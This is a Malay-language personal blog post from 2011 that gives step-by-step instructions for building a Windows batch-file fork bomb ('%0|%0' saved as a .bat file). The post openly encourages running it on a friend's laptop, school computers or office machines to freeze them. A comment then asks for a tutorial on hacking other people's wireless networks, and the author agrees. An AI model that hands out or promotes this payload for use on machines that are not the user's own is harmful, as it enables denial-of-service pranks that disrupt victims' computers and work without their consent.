Pages

Banner 468 x 60px

boyfren hensem
anak luar nikah
kahwin lari
 

Saturday, January 15, 2011

HACK LAGI!! HACK LAGI!!!

2 orang comel komen~
hahahahahaa..(ktawa jahat..).. untuk entri kali ne, aq nak ajar korang buat virus yang paling simple atas muka bumi ne...nama virus ne, Fork Bomb...

hmm....apa fungsi virus ne?? letupkan pc?? BUKAN!!! walaupun nama dia ada 'bomb', tp beliau x la sekejam tu... beliau telah diberi amanat untuk membuatkan total pc tu jam bila korang launch beliau sebab beliau akan bukak 500 command prompt process.. so, cpu tu akan overloaded dan secara x langsung komputer tu akan freeze!!! TIDAK!! tp apa kisah kan? aq taw korang x kan launch benda ni kat laptop korang pun ...tpulang la...kat laptop kawan, atau komputer skola, komputer pejabat...anytyme, anywhere...nak tau camana?



1. bukak notepad & taip seperti berikut :

%0|%0


















2. save sebagai .bat, contohnya fork.bat



pastu tanpa rasa segan silu korang save la...


3. korang pun secara sengajanya akan dapat file camne..




4. apalagi, launch la menatang haram ne!! mudah dan menjimatkan kan?

p/s : untuk pulihkan balik pc yang dah kena hack, tuan punya pc tu kena reboot pc tu la...pastu dapat la dia guna balik pc macam biasa...ish3... jahat korang ne kan? nyusahkan orang...hehehe...

Blogger Templates

2 orang comel komen~:

Anonymous said...

Ape kate ko bt tuto pasal nak hack wireless org lain. erm... pakai BackTrack ke, atau ko ade care lain nak hack. cam tu baru namenye hacker... hehehe....

bLeED_DrumMeRz said...

ok2.... thanks 4 the feedback..